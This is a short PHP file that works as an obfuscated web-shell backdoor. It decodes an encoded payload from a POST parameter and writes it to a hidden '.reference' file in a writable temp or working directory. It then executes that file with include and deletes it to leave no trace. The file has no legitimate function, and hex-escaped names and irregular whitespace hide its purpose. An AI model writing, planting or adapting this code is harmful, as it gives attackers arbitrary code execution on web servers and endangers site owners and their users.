<?php

if(isset($_POST["v\x61\x6Cue"]) ? true : false){
	$bind = $_POST["v\x61\x6Cue"];
		 	$bind	=explode 	(".", 	 $bind		); 
	$ref = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen( $salt);
            $w = 0;
    
            while( $w< count( $bind)) {
                $v1 = $bind[$w];
                $chS = ord( $salt[$w  %  $lenS]);
                $dec =( ( int)$v1 - $chS -( $w  %  10)) ^ 86;
                $ref .= chr( $dec);
                $w++;
            }
	$factor = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", "/tmp", "/var/tmp", getenv("TEMP"), session_save_path(), getcwd(), sys_get_temp_dir()]);
	foreach ($factor as $data) {
    		if (array_product([is_dir($data), is_writable($data)])) {
    $ent = vsprintf("%s/%s", [$data, ".reference"]);
    if (file_put_contents($ent, $ref)) {
	include $ent;
	@unlink($ent);
	exit;
}
}
}
}